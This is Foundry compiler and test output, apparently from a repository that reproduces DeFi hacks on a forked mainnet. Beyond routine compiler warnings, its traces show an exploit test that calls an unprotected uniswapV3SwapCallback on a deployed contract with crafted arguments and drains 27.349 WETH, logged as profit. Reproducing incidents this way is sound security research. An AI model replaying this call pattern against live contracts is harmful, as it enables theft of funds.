Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (3420): Source file does not specify required compiler version! Consider adding "pragma solidity ^0.8.28;"
--> src/test/2024-07/UnverifiedContr_0x452E25_exp.sol

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 497.07ms (3.85ms CPU time)

Ran 1 test for src/test/2024-07/UnverifiedContr_0x452E25_exp.sol:XXXExploit
[PASS] testExploit() (gas: 46344)
Logs:
  profit = : 27.349000000000000000

Traces:
  [3649] XXXExploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 20223094 [2.022e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [46344] XXXExploit::testExploit()
    ├─ [33630] 0x452E253EeB3Bb16e40337D647c01b6c910Aa84B3::uniswapV3SwapCallback(27349000000000000000 [2.734e19], 27349000000000000000 [2.734e19], 0x0000000000000000000000000000000000000000000000000000000000000001000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2)
    │   ├─ [29962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(XXXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 27349000000000000000 [2.734e19])
    │   │   ├─ emit Transfer(from: 0x452E253EeB3Bb16e40337D647c01b6c910Aa84B3, to: XXXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 27349000000000000000 [2.734e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x30f851f04b5650a6d8e64011138bd37c3a3686c8e9f3066cb3427c9dc0b7b458: 0x0000000000000000000000000000000000000000000000017b8d6f501c45c4e4 → 0x000000000000000000000000000000000000000000000000000244b6d21d44e4
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000017b8b2a994a288000
    │   │   └─ ← [Return] true
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(XXXExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 27349000000000000000 [2.734e19]
    ├─ emit log_named_decimal_uint(key: "profit = ", val: 27349000000000000000 [2.734e19], decimals: 18)
    ├─  storage changes:
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000017b8b2a994a288000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.27s (962.42ms CPU time)

Ran 2 test suites in 2.28s (2.77s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
